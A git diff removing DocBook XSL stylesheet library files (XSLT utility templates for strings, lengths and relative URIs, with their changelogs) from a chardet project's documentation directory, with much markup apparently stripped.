-<xsl:template match="*" mode="insert.label.markup"> - <xsl:param name="purpose"/> - <xsl:param name="xrefstyle"/> - <xsl:param name="label"/> - - <xsl:copy-of select="$label"/> -</xsl:template> - -<xsl:template match="*" mode="insert.pagenumber.markup"> - <xsl:param name="purpose"/> - <xsl:param name="xrefstyle"/> - <xsl:param name="pagenumber"/> - - <xsl:copy-of select="$pagenumber"/> -</xsl:template> - -<xsl:template match="*" mode="insert.direction.markup"> - <xsl:param name="purpose"/> - <xsl:param name="xrefstyle"/> - <xsl:param name="direction"/> - - <xsl:copy-of select="$direction"/> -</xsl:template> - -</xsl:stylesheet> diff --git a/chardet/docs/docbook/xsl/lib/ChangeLog b/chardet/docs/docbook/xsl/lib/ChangeLog deleted file mode 100644 index 8ab7a53..0000000 --- a/chardet/docs/docbook/xsl/lib/ChangeLog +++ /dev/null @@ -1,66 +0,0 @@ -2003-04-05 Adam Di Carlo <adicarlo@users.sourceforge.net> - - * lib.xweb: a pica is 12 points, rather than a sixth of an inch - -2003-03-26 Michael Smith <xmldoc@users.sourceforge.net> - - * Makefile: wdocbook.xsl obsoleted by w2docbook.xsl, updated globally - -2003-03-25 Michael Smith <xmldoc@users.sourceforge.net> - - * Makefile: reverting wdocbook.xsl -> w2docbook.xsl changes - -2003-03-05 Michael Smith <xmldoc@users.sourceforge.net> - - * Makefile: - - Wrong filename was breaking build, fixed. - - Had ../../litprog/wdocbook.xsl but needed ../../litprog/w2docbook.xsl - -2002-09-15 Norman Walsh <nwalsh@users.sourceforge.net> - - * lib.xweb: Fix bug where PIs match the suffix of a name instead of the whole name - -2002-06-09 Norman Walsh <nwalsh@users.sourceforge.net> - - * lib.xweb: Fix bug #496453: make sure comments don't contain illegal chars - -2002-05-12 Norman Walsh <nwalsh@users.sourceforge.net> - - * lib.xweb: Changed default units to px; added length-in-points template - -2002-03-25 Norman Walsh <nwalsh@users.sourceforge.net> - - * .cvsignore: Ignore lib.xsl too - - * .cvsignore, Makefile, lib.xsl, lib.xweb: Use Literate XML to generate lib.xsl - - * Makefile: Update documentation build to reflect use of lib.xweb - -2002-03-18 Norman Walsh <nwalsh@users.sourceforge.net> - - * lib.xsl: Replace generate.*.toc and generate.*.lot with single generate.toc parameter. - -2002-03-14 Norman Walsh <nwalsh@users.sourceforge.net> - - * lib.xsl: Whitespace only: change CR/LF back to LF. Norm was a total moron. - - * lib.xsl: Whitespace changes only: use PC-style CR/LF because Unix clients choke on this far less often than PC clients choke on the reverse. Grrr. - -2002-01-09 Norman Walsh <nwalsh@users.sourceforge.net> - - * lib.xsl: Added length-units template to extract units from lengths - -2001-11-28 Norman Walsh <nwalsh@users.sourceforge.net> - - * lib.xsl: Added pi-attribute template - -2001-04-03 Norman Walsh <nwalsh@users.sourceforge.net> - - * lib.xsl: Documentation fixes - -2001-04-02 Norman Walsh <nwalsh@users.sourceforge.net> - - * lib.xsl: New file. - diff --git a/chardet/docs/docbook/xsl/lib/lib.xml b/chardet/docs/docbook/xsl/lib/lib.xml deleted file mode 100644 index 5de4129..0000000 --- a/chardet/docs/docbook/xsl/lib/lib.xml +++ /dev/null @@ -1,771 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<!-- This file was generated by weave.xsl version 0.00+. Do not edit! --> -<!-- See http://sourceforge.net/projects/docbook/ --> -<!DOCTYPE book - PUBLIC "-//DocBook Open Repository//DTD DocBook Literate Programming V0.0//EN" "http://docbook.sourceforge.net/release/litprog/current/dtd/ldocbook.dtd"> -<book xmlns:src="http://nwalsh.com/xmlns/litprog/fragment" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> -<bookinfo> -<title>XSL Library Template Reference -$Id: lib.xml,v 1.1.1.1 2004/06/22 02:10:38 f8dy Exp $ - -DocBook Open Repository Team - - 1999 - 2000 - 2001 - 2002 - Norman Walsh - - - -Introduction - -This is technical reference documentation for the DocBook XSL -Stylesheets; it documents (some of) the parameters, templates, and -other elements of the stylesheets. - -This is not intended to be user documentation. -It is provided for developers writing customization layers for the -stylesheets, and for anyone who's interested in how it -works. - -Although I am trying to be thorough, this documentation is known -to be incomplete. Don't forget to read the source, too :-) - - - - -General Library Templates - - - -dot.count -Returns the number of . characters in a string - - -Description - -<xsl:template name="dot.count"> - <!-- Returns the number of "." characters in a string --> - <xsl:param name="string"/> - <xsl:param name="count" - select="0"/> - <xsl:choose> - <xsl:when test="contains($string, '.')"> - <xsl:call-template name="dot.count"> - <xsl:with-param name="string" - select="substring-after($string, '.')"/> - <xsl:with-param name="count" - select="$count+1"/> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$count"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - - - -copy-string -Returns count copies of a string - - -Description - -<xsl:template name="copy-string"> - <!-- returns 'count' copies of 'string' --> - <xsl:param name="string"/> - <xsl:param name="count" - select="0"/> - <xsl:param name="result"/> - - <xsl:choose> - <xsl:when test="$count>0"> - <xsl:call-template name="copy-string"> - <xsl:with-param name="string" - select="$string"/> - <xsl:with-param name="count" - select="$count - 1"/> - <xsl:with-param name="result"> - <xsl:value-of select="$result"/> - <xsl:value-of select="$string"/> - </xsl:with-param> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$result"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - - - -string.subst -Substitute one text string for another in a string - - -Description - -The string.subst template replaces all -occurances of target in string -with replacement and returns the result. - - -<xsl:template name="string.subst"> - <xsl:param name="string"/> - <xsl:param name="target"/> - <xsl:param name="replacement"/> - - <xsl:choose> - <xsl:when test="contains($string, $target)"> - <xsl:variable name="rest"> - <xsl:call-template name="string.subst"> - <xsl:with-param name="string" - select="substring-after($string, $target)"/> - <xsl:with-param name="target" - select="$target"/> - <xsl:with-param name="replacement" - select="$replacement"/> - </xsl:call-template> - </xsl:variable> - <xsl:value-of select="concat(substring-before($string, $target), $replacement, $rest)"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$string"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - - - -xpointer.idref -Extract IDREF from an XPointer - - -Description - -The xpointer.idref template returns the -ID portion of an XPointer which is a pointer to an ID within the current -document, or the empty string if it is not. -In other words, xpointer.idref returns -foo when passed either #foo -or #xpointer(id('foo')), otherwise it returns -the empty string. - -<xsl:template name="xpointer.idref"> - <xsl:param name="xpointer">http://...</xsl:param> - <xsl:choose> - <xsl:when test="starts-with($xpointer, '#xpointer(id(')"> - <xsl:variable name="rest" - select="substring-after($xpointer, '#xpointer(id(')"/> - <xsl:variable name="quote" - select="substring($rest, 1, 1)"/> - <xsl:value-of select="substring-before(substring-after($xpointer, $quote), $quote)"/> - </xsl:when> - <xsl:when test="starts-with($xpointer, '#')"> - <xsl:value-of select="substring-after($xpointer, '#')"/> - </xsl:when> - <!-- otherwise it's a pointer to some other document --> - </xsl:choose> -</xsl:template> - - - - - - - - - -length-magnitude -Return the unqualified dimension from a length specification - - -Description - -The length-magnitude template returns the -unqualified length ("20" for "20pt") from a dimension. - - -<xsl:template name="length-magnitude"> - <xsl:param name="length" - select="'0pt'"/> - - <xsl:choose> - <xsl:when test="string-length($length) = 0"/> - <xsl:when test="substring($length,1,1) = '0' or substring($length,1,1) = '1' or substring($length,1,1) = '2' or substring($length,1,1) = '3' or substring($length,1,1) = '4' or substring($length,1,1) = '5' or substring($length,1,1) = '6' or substring($length,1,1) = '7' or substring($length,1,1) = '8' or substring($length,1,1) = '9' or substring($length,1,1) = '.'"> - <xsl:value-of select="substring($length,1,1)"/> - <xsl:call-template name="length-magnitude"> - <xsl:with-param name="length" - select="substring($length,2)"/> - </xsl:call-template> - </xsl:when> - </xsl:choose> -</xsl:template> - - - - - - - - -length-units -Return the units from a length specification - - -Description - -The length-units template returns the -units ("pt" for "20pt") from a length. If no units are supplied on the -length, the defauilt.units are returned. - -<xsl:template name="length-units"> - <xsl:param name="length" - select="'0pt'"/> - <xsl:param name="default.units" - select="'px'"/> - <xsl:variable name="magnitude"> - <xsl:call-template name="length-magnitude"> - <xsl:with-param name="length" - select="$length"/> - </xsl:call-template> - </xsl:variable> - - <xsl:variable name="units"> - <xsl:value-of select="substring($length, string-length($magnitude)+1)"/> - </xsl:variable> - - <xsl:choose> - <xsl:when test="$units = ''"> - <xsl:value-of select="$default.units"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$units"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - - - -length-spec -Return a fully qualified length specification - - -Description - -The length-spec template returns the -qualified length from a dimension. If an unqualified length is given, -the default.units will be added to it. - - -<xsl:template name="length-spec"> - <xsl:param name="length" - select="'0pt'"/> - <xsl:param name="default.units" - select="'px'"/> - - <xsl:variable name="magnitude"> - <xsl:call-template name="length-magnitude"> - <xsl:with-param name="length" - select="$length"/> - </xsl:call-template> - </xsl:variable> - - <xsl:variable name="units"> - <xsl:value-of select="substring($length, string-length($magnitude)+1)"/> - </xsl:variable> - - <xsl:value-of select="$magnitude"/> - <xsl:choose> - <xsl:when test="$units='cm' or $units='mm' or $units='in' or $units='pt' or $units='pc' or $units='px' or $units='em'"> - <xsl:value-of select="$units"/> - </xsl:when> - <xsl:when test="$units = ''"> - <xsl:value-of select="$default.units"/> - </xsl:when> - <xsl:otherwise> - <xsl:message> - <xsl:text>Unrecognized unit of measure: </xsl:text> - <xsl:value-of select="$units"/> - <xsl:text>.</xsl:text> - </xsl:message> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - - - -length-in-points -Returns the size, in points, of a specified length - - -Description - -The length-in-points template converts a length -specification to points and returns that value as an unqualified -number. - - - -There is no way for the template to infer the size of an -em. It relies on the default em.size -which is initially 10 (for 10pt). - -Similarly, converting pixesl to points relies on the -pixels.per.inch parameter which is initially -90. - - - -<xsl:template name="length-in-points"> - <xsl:param name="length" - select="'0pt'"/> - <xsl:param name="em.size" - select="10"/> - <xsl:param name="pixels.per.inch" - select="90"/> - - <xsl:variable name="magnitude"> - <xsl:call-template name="length-magnitude"> - <xsl:with-param name="length" - select="$length"/> - </xsl:call-template> - </xsl:variable> - - <xsl:variable name="units"> - <xsl:value-of select="substring($length, string-length($magnitude)+1)"/> - </xsl:variable> - - <xsl:choose> - <xsl:when test="$units = 'pt'"> - <xsl:value-of select="$magnitude"/> - </xsl:when> - <xsl:when test="$units = 'cm'"> - <xsl:value-of select="$magnitude div 2.54 * 72.0"/> - </xsl:when> - <xsl:when test="$units = 'mm'"> - <xsl:value-of select="$magnitude div 25.4 * 72.0"/> - </xsl:when> - <xsl:when test="$units = 'in'"> - <xsl:value-of select="$magnitude * 72.0"/> - </xsl:when> - <xsl:when test="$units = 'pc'"> - <xsl:value-of select="$magnitude div 6.0 * 72.0"/> - </xsl:when> - <xsl:when test="$units = 'px'"> - <xsl:value-of select="$magnitude div $pixels.per.inch * 72.0"/> - </xsl:when> - <xsl:when test="$units = 'em'"> - <xsl:value-of select="$magnitude * $em.size"/> - </xsl:when> - <xsl:otherwise> - <xsl:message> - <xsl:text>Unrecognized unit of measure: </xsl:text> - <xsl:value-of select="$units"/> - <xsl:text>.</xsl:text> - </xsl:message> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - - - -pi-attribute -Extract a pseudo-attribute from a PI - - -Description - -The pi-attribute template extracts a pseudo-attribute -from a processing instruction. For example, given the PI -<?foo bar="1" baz='red'?>, -<xsl:call-template name="pi-attribute"> - <xsl:with-param name="pis" select="processing-instruction('foo')"/> - <xsl:with-param name="attribute" select="'baz'"/> -</xsl:call-template> -will return red. This template returns the first matching -attribute that it finds. Presented with processing instructions that -contain badly formed pseudo-attributes (missing or unbalanced quotes, -for example), the template may silently return erroneous results. - -<xsl:template name="pi-attribute"> - <xsl:param name="pis" - select="processing-instruction('')"/> - <xsl:param name="attribute">filename</xsl:param> - <xsl:param name="count">1</xsl:param> - - <xsl:choose> - <xsl:when test="$count>count($pis)"> - <!-- not found --> - </xsl:when> - <xsl:otherwise> - <xsl:variable name="pi"> - <xsl:value-of select="$pis[$count]"/> - </xsl:variable> - <xsl:choose> - <xsl:when test="contains($pi,concat($attribute, '='))"> - <xsl:variable name="rest" - select="substring-after($pi,concat($attribute,'='))"/> - <xsl:variable name="quote" - select="substring($rest,1,1)"/> - <xsl:value-of select="substring-before(substring($rest,2),$quote)"/> - </xsl:when> - <xsl:otherwise> - <xsl:call-template name="pi-attribute"> - <xsl:with-param name="pis" - select="$pis"/> - <xsl:with-param name="attribute" - select="$attribute"/> - <xsl:with-param name="count" - select="$count + 1"/> - </xsl:call-template> - </xsl:otherwise> - </xsl:choose> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - - - -lookup.key -Retrieve the value associated with a particular key in a table - - -Description - -Given a table of space-delimited key/value pairs, -the lookup.key template extracts the value associated -with a particular key. - -<xsl:template name="lookup.key"> - <xsl:param name="key" - select="''"/> - <xsl:param name="table" - select="''"/> - - <xsl:if test="contains($table, ' ')"> - <xsl:choose> - <xsl:when test="substring-before($table, ' ') = $key"> - <xsl:variable name="rest" - select="substring-after($table, ' ')"/> - <xsl:choose> - <xsl:when test="contains($rest, ' ')"> - <xsl:value-of select="substring-before($rest, ' ')"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$rest"/> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - <xsl:otherwise> - <xsl:call-template name="lookup.key"> - <xsl:with-param name="key" - select="$key"/> - <xsl:with-param name="table" - select="substring-after(substring-after($table,' '), ' ')"/> - </xsl:call-template> - </xsl:otherwise> - </xsl:choose> - </xsl:if> -</xsl:template> - - - - - - - - -xpath.location -Calculate the XPath child-sequence to the current node - - -Description - -The xpath.location template calculates the -absolute path from the root of the tree to the current element node. - - -<xsl:template name="xpath.location"> - <xsl:param name="node" - select="."/> - <xsl:param name="path" - select="''"/> - - <xsl:variable name="next.path"> - <xsl:value-of select="local-name($node)"/> - <xsl:if test="$path != ''">/</xsl:if> - <xsl:value-of select="$path"/> - </xsl:variable> - - <xsl:choose> - <xsl:when test="$node/parent::*"> - <xsl:call-template name="xpath.location"> - <xsl:with-param name="node" - select="$node/parent::*"/> - <xsl:with-param name="path" - select="$next.path"/> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <xsl:text>/</xsl:text> - <xsl:value-of select="$next.path"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - - - -comment-escape-string -Prepare a string for inclusion in an XML comment - - -Description - -The comment-escape-string template returns a string -that has been transformed so that it can safely be output as an XML comment. -Internal occurrences of "--" will be replaced with "- -" and a leading and/or -trailing space will be added to the string, if necessary. - -<xsl:template name="comment-escape-string"> - <xsl:param name="string" - select="''"/> - - <xsl:if test="starts-with($string, '-')"> - <xsl:text> </xsl:text> - </xsl:if> - - <xsl:call-template name="comment-escape-string.recursive"> - <xsl:with-param name="string" - select="$string"/> - </xsl:call-template> - - <xsl:if test="substring($string, string-length($string), 1) = '-'"> - <xsl:text> </xsl:text> - </xsl:if> -</xsl:template> - - - - - - -comment-escape-string.recursive -Internal function used by comment-escape-string - - -Description - -The comment-escape-string.recursive template is used -by comment-escape-string. - -<xsl:template name="comment-escape-string.recursive"> - <xsl:param name="string" - select="''"/> - <xsl:choose> - <xsl:when test="contains($string, '--')"> - <xsl:value-of select="substring-before($string, '--')"/> - <xsl:value-of select="'- -'"/> - <xsl:call-template name="comment-escape-string.recursive"> - <xsl:with-param name="string" - select="substring-after($string, '--')"/> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$string"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - -Relative URI Functions - -Introduction - -These functions manipulate relative URI references. - -The following assumptions must hold true: - - - -All URIs are relative. - - -No URI contains the ../ sequence -which would effectively move up the hierarchy. - - - -If these assumptions do not hold, the results are unpredictable. - - - - - -count.uri.path.depth -Count the number of path components in a relative URI - - -Description - -This function counts the number of path components in a relative URI. - -<xsl:template name="count.uri.path.depth"> - <xsl:param name="filename" - select="''"/> - <xsl:param name="count" - select="0"/> - - <xsl:choose> - <xsl:when test="contains($filename, '/')"> - <xsl:call-template name="count.uri.path.depth"> - <xsl:with-param name="filename" - select="substring-after($filename, '/')"/> - <xsl:with-param name="count" - select="$count + 1"/> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$count"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - -trim.common.uri.paths -Trim common leading path components from a relative URI - - -Description - -This function trims common leading path components from a relative URI. - -<xsl:template name="trim.common.uri.paths"> - <xsl:param name="uriA" - select="''"/> - <xsl:param name="uriB" - select="''"/> - <xsl:param name="return" - select="'A'"/> - - <xsl:choose> - <xsl:when test="contains($uriA, '/') and contains($uriB, '/') and substring-before($uriA, '/') = substring-before($uriB, '/')"> - <xsl:call-template name="trim.common.uri.paths"> - <xsl:with-param name="uriA" - select="substring-after($uriA, '/')"/> - <xsl:with-param name="uriB" - select="substring-after($uriB, '/')"/> - <xsl:with-param name="return" - select="$return"/> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <xsl:choose> - <xsl:when test="$return = 'A'"> - <xsl:value-of select="$uriA"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$uriB"/> - </xsl:otherwise> - </xsl:choose> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - - - - - - -The Stylesheet - -The lib.xsl stylesheet is just a wrapper -around these functions. - - -<!-- ******************************************************************** - $Id: lib.xml,v 1.1.1.1 2004/06/22 02:10:38 f8dy Exp $ - ******************************************************************** - - This file is part of the XSL DocBook Stylesheet distribution. - See ../README or http://nwalsh.com/docbook/xsl/ for copyright - and other information. - - This module implements DTD-independent functions - - ******************************************************************** --> - -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" - exclude-result-prefixes="src" - version="1.0"> - - - - - - - - - - - - - - - - - -</xsl:stylesheet> - - - \ No newline at end of file diff --git a/chardet/docs/docbook/xsl/lib/lib.xsl b/chardet/docs/docbook/xsl/lib/lib.xsl deleted file mode 100644 index 73f0934..0000000 --- a/chardet/docs/docbook/xsl/lib/lib.xsl +++ /dev/null @@ -1,383 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://... - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Unrecognized unit of measure: - - . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Unrecognized unit of measure: - - . - - - - - - - - - filename - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - / - - - - - - - - - - - - / - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/lib/lib.xweb b/chardet/docs/docbook/xsl/lib/lib.xweb deleted file mode 100644 index d387f06..0000000 --- a/chardet/docs/docbook/xsl/lib/lib.xweb +++ /dev/null @@ -1,769 +0,0 @@ - - -XSL Library Template Reference -$Id: lib.xweb,v 1.1.1.1 2004/06/22 02:10:40 f8dy Exp $ - -DocBook Open Repository Team - - 1999 - 2000 - 2001 - 2002 - Norman Walsh - - - -Introduction - -This is technical reference documentation for the DocBook XSL -Stylesheets; it documents (some of) the parameters, templates, and -other elements of the stylesheets. - -This is not intended to be user documentation. -It is provided for developers writing customization layers for the -stylesheets, and for anyone who's interested in how it -works. - -Although I am trying to be thorough, this documentation is known -to be incomplete. Don't forget to read the source, too :-) - - - - -General Library Templates - - - -dot.count -Returns the number of . characters in a string - - -Description - - - - - - - - - - - - - - - - - - - - - - - - - - - -copy-string -Returns count copies of a string - - -Description - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -string.subst -Substitute one text string for another in a string - - -Description - -The string.subst template replaces all -occurances of target in string -with replacement and returns the result. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -xpointer.idref -Extract IDREF from an XPointer - - -Description - -The xpointer.idref template returns the -ID portion of an XPointer which is a pointer to an ID within the current -document, or the empty string if it is not. -In other words, xpointer.idref returns -foo when passed either #foo -or #xpointer(id('foo')), otherwise it returns -the empty string. - - - - http://... - - - - - - - - - - - - - - - - - - - - - - -length-magnitude -Return the unqualified dimension from a length specification - - -Description - -The length-magnitude template returns the -unqualified length ("20" for "20pt") from a dimension. - - - - - - - - - - - - - - - - - - - - - - - - - -length-units -Return the units from a length specification - - -Description - -The length-units template returns the -units ("pt" for "20pt") from a length. If no units are supplied on the -length, the defauilt.units are returned. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -length-spec -Return a fully qualified length specification - - -Description - -The length-spec template returns the -qualified length from a dimension. If an unqualified length is given, -the default.units will be added to it. - - - - - - - - - - - - - - - - - - - - - - - - - - - - Unrecognized unit of measure: - - . - - - - - - - - - - - - - -length-in-points -Returns the size, in points, of a specified length - - -Description - -The length-in-points template converts a length -specification to points and returns that value as an unqualified -number. - - - -There is no way for the template to infer the size of an -em. It relies on the default em.size -which is initially 10 (for 10pt). - -Similarly, converting pixesl to points relies on the -pixels.per.inch parameter which is initially -90. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Unrecognized unit of measure: - - . - - - - - - - - - - - - - -pi-attribute -Extract a pseudo-attribute from a PI - - -Description - -The pi-attribute template extracts a pseudo-attribute -from a processing instruction. For example, given the PI -<?foo bar="1" baz='red'?>, - - - -]]> -will return red. This template returns the first matching -attribute that it finds. Presented with processing instructions that -contain badly formed pseudo-attributes (missing or unbalanced quotes, -for example), the template may silently return erroneous results. - - - - - filename - 1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -lookup.key -Retrieve the value associated with a particular key in a table - - -Description - -Given a table of space-delimited key/value pairs, -the lookup.key template extracts the value associated -with a particular key. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -xpath.location -Calculate the XPath child-sequence to the current node - - -Description - -The xpath.location template calculates the -absolute path from the root of the tree to the current element node. - - - - - - - - - - / - - - - - - - - - - - - / - - - - - - - - - - - - - -comment-escape-string -Prepare a string for inclusion in an XML comment - - -Description - -The comment-escape-string template returns a string -that has been transformed so that it can safely be output as an XML comment. -Internal occurrences of "--" will be replaced with "- -" and a leading and/or -trailing space will be added to the string, if necessary. - - - - - - - - - - - - - - - - - - - - - - - - -comment-escape-string.recursive -Internal function used by comment-escape-string - - -Description - -The comment-escape-string.recursive template is used -by comment-escape-string. - - - - - - - - - - - - - - - - - - - - - - - - -Relative URI Functions - -Introduction - -These functions manipulate relative URI references. - -The following assumptions must hold true: - - - -All URIs are relative. - - -No URI contains the ../ sequence -which would effectively move up the hierarchy. - - - -If these assumptions do not hold, the results are unpredictable. - - - - - -count.uri.path.depth -Count the number of path components in a relative URI - - -Description - -This function counts the number of path components in a relative URI. - - - - - - - - - - - - - - - - - - - - - - - - - -trim.common.uri.paths -Trim common leading path components from a relative URI - - -Description - -This function trims common leading path components from a relative URI. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -The Stylesheet - -The lib.xsl stylesheet is just a wrapper -around these functions. - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/xsl/params/ChangeLog b/chardet/docs/docbook/xsl/params/ChangeLog deleted file mode 100644 index 0750c38..0000000 --- a/chardet/docs/docbook/xsl/params/ChangeLog +++ /dev/null @@ -1,711 +0,0 @@ -2004-03-04 Norman Walsh - - * root.properties.xml: Added line-height-shift-adjustment=disregard-shifts to the root properties - - * table.properties.xml: Clarified description pointing to the distinction between table.properties and table.table.properties - - * table.table.properties.xml: New file. - -2004-02-13 Michael Smith - - * htmlhelp.hhp.windows.xml, htmlhelp.show.toolbar.text.xml: - remove stray single quotes for ID values; - was causing generation of invalid filenames & breaking downstream builds - -2004-01-31 Norman Walsh - - * footer.column.widths.xml, header.column.widths.xml: Add quotes to make the parameters strings; '1 1 1' is not a valid number - -2004-01-29 Robert Stayton - - * footer.column.widths.xml, header.column.widths.xml: New file. - -2003-12-15 Norman Walsh - - * article.appendix.title.properties.xml: Fixed typo in use-attribute-sets attribute - - * title.margin.left.xml: Fix typo in parameter end tag - -2003-12-10 Robert Stayton - - * marker.section.level.xml: New file. - -2003-12-07 Robert Stayton - - * article.appendix.title.properties.xml: New file. - -2003-12-05 Robert Stayton - - * refentry.pagebreak.xml: New file. - - * refentry.title.properties.xml: Added space-before properties since page breaks are now optional. - Added a description paragraph. - -2003-12-04 Norman Walsh - - * subscript.properties.xml, superscript.properties.xml: - New file. - -2003-11-29 Jirka Kosek - - * htmlhelp.display.progress.xml, htmlhelp.enhanced.decompilation.xml, htmlhelp.hhc.width.xml, htmlhelp.hhp.windows.xml, htmlhelp.remember.window.position.xml, htmlhelp.show.toolbar.text.xml, htmlhelp.window.geometry.xml: - New file. - -2003-11-25 Robert Stayton - - * title.margin.left.xml: Set to zero if passivetex.extensions != 0 since PassiveTeX - cannot handle the math expression with negative values. - -2003-10-04 Jirka Kosek - - * index.preferred.page.properties.xml: New file. - -2003-09-28 Norman Walsh - - * formal.object.properties.xml: Use keep-together.within-column, not keep-together as that's a compound property inherited by fo:inline and other elements with bad effects - -2003-09-24 Robert Stayton - - * xep.index.item.properties.xml: Fixed the ulink reference to xep. - -2003-09-23 Jirka Kosek - - * manifest.in.base.dir.xml: New file. - -2003-09-10 Robert Stayton - - * section.level1.properties.xml, section.level2.properties.xml, section.level3.properties.xml, section.level4.properties.xml, section.level5.properties.xml, section.level6.properties.xml: - Add use-attribute-set="section.properties" to each set. - -2003-09-09 Robert Stayton - - * section.level1.properties.xml, section.level2.properties.xml, section.level3.properties.xml, section.level4.properties.xml, section.level5.properties.xml, section.level6.properties.xml: - New file. - - * section.properties.xml: New file. - -2003-09-02 Robert Stayton - - * title.margin.left.xml: Must add unit indicator if set value to zero. - -2003-08-29 Robert Stayton - - * footer.content.properties.xml, header.content.properties.xml: - Changed $body.font.family to $body.fontset to include - symbol.font.family fonts in headers and footers. - -2003-08-28 Robert Stayton - - * root.properties.xml: Changed body.font.family to body.fontset and - title.font.family to title.fontset in font-family property - attributes, in order to append symbol.font.family parameter value. - - * symbol.font.family.xml: New file. - -2003-08-27 Norman Walsh - - * formal.title.placement.xml: Added task - -2003-08-14 Robert Stayton - - * variablelist.max.termlength.xml: New file. - -2003-07-25 Robert Stayton - - * insert.xref.page.number.xml: Changed from a boolean to a string with values yes, no, maybe - to support xrefstyle attribute on xrefs. - - * xref.label-page.separator.xml, xref.label-title.separator.xml, xref.title-page.separator.xml: - New file. - -2003-07-22 Jirka Kosek - - * eclipse.autolabel.xml, eclipse.plugin.id.xml, eclipse.plugin.name.xml, eclipse.plugin.provider.xml: - New file. - -2003-06-22 Robert Stayton - - * qanda.title.level1.properties.xml, qanda.title.level2.properties.xml, qanda.title.level3.properties.xml, qanda.title.level4.properties.xml, qanda.title.level5.properties.xml, qanda.title.level6.properties.xml, qanda.title.properties.xml: - New file. - -2003-06-21 Norman Walsh - - * column.gap.back.xml, column.gap.body.xml, column.gap.front.xml, column.gap.index.xml, column.gap.lot.xml, column.gap.titlepage.xml: - New file. - - * suppress.footer.navigation.xml, suppress.header.navigation.xml: - Fixed id values - - * use.role.for.mediaobject.xml: Editorial nit. - -2003-05-27 Jirka Kosek - - * htmlhelp.hhc.folders.instead.books.xml: Notice of HTML Help limitation. - -2003-05-15 Jirka Kosek - - * axf.extensions.xml, xep.extensions.xml: Added support for AntennaHouse XSL Formatter. You can use axf.extensions=1 setting to generate bookmarks, document info and to merge duplicate page numbers in index. - -2003-05-14 Jirka Kosek - - * xep.index.item.properties.xml: New file. - -2003-05-08 Norman Walsh - - * formal.object.properties.xml: Keep formal object titles together - -2003-05-07 Robert Stayton - - * admon.textlabel.xml: New file. - - * admon.textlabel.xml: Set default to 1. - - * admon.textlabel.xml: Changed admon.textlabel doc. - -2003-04-12 Norman Walsh - - * ebnf.assignment.xml, ebnf.statement.terminator.xml, root.properties.xml: - New file. - - * generate.section.toc.level.xml: Whitespace - -2003-02-14 Norman Walsh - - * component.title.properties.xml: No longer used; causes confusion. Buh-bye. - -2003-02-07 Jirka Kosek - - * toc.max.depth.xml: New file. - -2003-01-31 Norman Walsh - - * footer.content.properties.xml, header.content.properties.xml: - Don't set the margin-right to the title.margin.left. D'Oh. - - * monospace.properties.xml: Remove font-size; it just looks ugly in the general case - -2003-01-28 Norman Walsh - - * glossterm.auto.link.xml: Whitespace - -2003-01-20 Norman Walsh - - * entry.propagates.style.xml: New file. - - * footnote.number.format.xml, footnote.number.symbols.xml, table.footnote.number.format.xml, table.footnote.number.symbols.xml: - New file. - - * glossentry.show.acronym.xml: New file. - - * section.title.level1.properties.xml, section.title.level2.properties.xml, section.title.level3.properties.xml, section.title.level4.properties.xml, section.title.level5.properties.xml, section.title.level6.properties.xml: - Make section title font sizes a function of the body size, not an absolute size. And let's use magsteps while we're at it. - - * ulink.footnote.number.format.xml: New file. - - * ulink.footnotes.xml: It is too implemented. :-) - - * verbatim.properties.xml: Put space below verbatim blocks too. - - * xref.with.number.and.title.xml: New file. - -2003-01-17 Norman Walsh - - * body.font.master.xml, css.decoration.xml, double.sided.xml: - Whitespace - - * formal.title.properties.xml: Make font size 1.2 times the body size, not a fixed 12pt - -2003-01-01 Norman Walsh - - * equation.properties.xml, example.properties.xml, figure.properties.xml, procedure.properties.xml, table.properties.xml: - New file. - - * 